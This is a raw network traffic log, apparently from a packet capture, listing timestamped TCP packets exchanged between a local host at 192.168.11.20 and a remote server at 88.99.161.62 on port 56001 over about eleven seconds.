                                                                              Dec 10, 2024 07:01:22.118573904 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:22.128637075 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:22.188560009 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:22.188666105 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:22.253309965 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:22.253354073 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:22.253722906 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:22.342097998 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:22.342243910 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:22.347927094 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:22.357913971 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:22.404146910 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:22.404165030 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:22.485614061 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:22.557611942 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:22.557763100 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:22.557774067 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:22.558053970 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:22.618107080 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:22.618499041 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:22.642884016 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:22.642936945 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:22.700925112 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:22.700941086 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:22.700949907 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:22.789592028 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:22.789635897 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:22.789684057 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:22.789879084 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:22.858472109 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:22.878024101 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:22.937171936 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:23.004987955 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:23.005249023 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:23.089967012 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:23.152659893 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:23.152677059 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:23.221836090 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:23.222017050 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:23.305268049 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:23.305289984 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:23.374252081 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:23.374315023 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:23.437324047 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:23.437369108 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:23.437619925 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:23.520860910 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:23.589579105 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:23.589590073 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:23.674511909 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:23.674556017 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:23.736094952 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:23.736288071 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:23.820420027 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:23.889868021 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:23.955471992 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:23.955547094 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:24.035821915 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:24.108437061 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:24.170787096 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:24.170804977 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:24.170986891 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:24.254354954 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:24.254417896 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:24.323740959 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:24.323760033 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:24.323769093 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:24.406239033 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:24.470005989 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:24.555035114 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:24.621471882 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:24.621486902 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:24.621496916 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:24.711994886 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:24.712110996 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:24.770437956 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:24.770478010 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:24.770504951 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:24.855158091 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:24.927438021 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:24.927725077 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:24.927733898 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:24.990741014 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:24.990848064 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:25.070384026 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:25.070409060 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:25.070417881 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:25.144876003 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:25.205971003 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:25.205993891 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:25.206187010 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:25.290766954 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:25.290875912 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:25.360474110 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:25.423652887 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:25.423701048 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:25.506241083 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:25.506258965 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:25.572312117 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:25.572427988 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:25.639023066 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:25.639313936 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:25.709675074 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:25.787585020 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:25.787877083 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:25.859675884 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:25.859822989 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:25.924913883 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:25.925208092 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:26.005763054 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:26.005860090 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:26.076653004 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:26.076664925 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:26.076673985 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:26.155850887 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:26.155905008 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:26.221076965 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:26.221267939 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:26.307615995 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:26.307780027 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:26.371113062 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:26.446003914 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:26.446053982 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:26.522964001 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:26.523133993 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:26.590147018 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:26.590313911 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:26.661412954 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:26.661456108 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:26.661484003 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:26.763659954 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:26.763767958 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:26.805418015 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:26.805699110 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:26.910424948 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:26.910514116 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:26.979135990 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:26.979384899 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:27.057368994 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:27.057463884 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:27.125948906 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:27.126188993 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:27.126353025 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:27.196738958 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:27.196845055 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:27.273363113 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:27.342619896 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:27.342794895 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:27.412319899 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:27.412384033 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:27.494941950 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:27.495033026 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:27.558192968 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:27.558474064 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:27.625228882 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:27.625345945 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:27.710498095 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:27.710733891 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:27.711015940 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:27.777503014 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:27.777683020 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:27.841023922 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:27.841099977 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:27.841129065 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:27.926866055 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:27.926963091 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:27.993343115 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:27.993387938 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:27.993417025 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:28.077058077 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:28.077181101 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:28.142376900 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:28.142657995 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:28.142702103 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:28.142919064 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:28.228022099 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:28.228144884 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:28.292442083 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:28.292680979 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:28.292927027 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:28.359041929 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:28.359143972 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:28.443350077 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:28.443721056 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:28.509967089 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:28.510065079 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:28.574341059 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:28.574352026 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:28.640058041 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:28.725167990 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:28.725183964 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:28.725217104 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:28.801000118 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:28.801156044 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:28.855436087 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:28.855448008 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:28.944112062 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:29.016474009 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:29.016522884 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:29.016551018 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:29.092277050 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:29.092384100 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:29.159481049 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:29.159507990 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:29.159518003 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:29.245474100 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:29.307770967 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:29.307823896 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:29.307851076 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:29.375926971 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:29.376086950 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:29.461024046 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:29.461185932 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:29.531140089 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:29.531246901 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:29.591342926 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:29.591764927 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:29.676891088 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:29.677006006 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:29.746831894 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:29.746902943 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:29.746932030 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:29.829719067 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:29.829826117 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:29.892360926 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:29.892437935 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:29.892465115 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:29.983932972 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:29.984107971 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:30.045322895 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:30.045427084 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:30.045938015 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:30.129528999 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:30.129571915 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:30.199409962 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:30.199769020 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:30.279416084 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:30.279567003 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:30.345743895 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:30.427292109 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:30.427382946 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:30.494865894 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:30.494908094 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:30.580636024 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:30.580816031 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:30.642853975 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:30.643017054 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:30.643029928 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:30.643265009 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:30.727617025 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:30.727674007 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:30.796643972 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:30.865139961 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:30.865314007 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:30.943200111 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:30.943243980 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:31.016204119 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:31.016299963 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:31.080854893 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:31.080902100 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:31.081151962 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:31.165371895 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:31.165543079 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:31.231673956 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:31.231863976 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:31.315252066 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:31.315359116 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:31.380713940 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:31.380903006 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:31.381155014 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:31.463816881 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:31.530621052 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:31.530664921 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:31.622199059 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:31.622363091 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:31.679935932 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:31.786411047 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:31.786571026 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:31.837779999 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:31.837940931 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:31.837973118 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:31.933145046 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:31.933305979 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:32.002149105 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:32.002192974 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:32.002259016 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:32.002491951 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:32.082067966 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:32.082233906 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:32.148952007 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:32.235717058 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:32.235761881 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:32.297684908 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:32.297728062 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:32.297949076 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:32.382955074 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:32.383127928 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:32.451050997 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:32.451092958 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:32.533092022 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:32.533158064 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:32.598450899 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:32.598700047 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:32.680689096 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:32.680852890 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:32.748815060 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:32.748859882 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:32.748888016 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:32.813878059 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:32.896332979 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:32.896467924 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:32.896553993 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:32.896581888 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:32.966175079 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:32.966295958 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:33.029165983 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:33.029253006 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:33.115905046 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:33.115971088 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:33.181607962 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:33.181900978 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:33.182091951 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:33.267159939 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:33.267343044 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:33.331204891 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:33.331675053 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:33.331732035 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:33.416677952 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:33.416765928 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:33.482537031 CET560014976288.99.161.62192.168.11.20
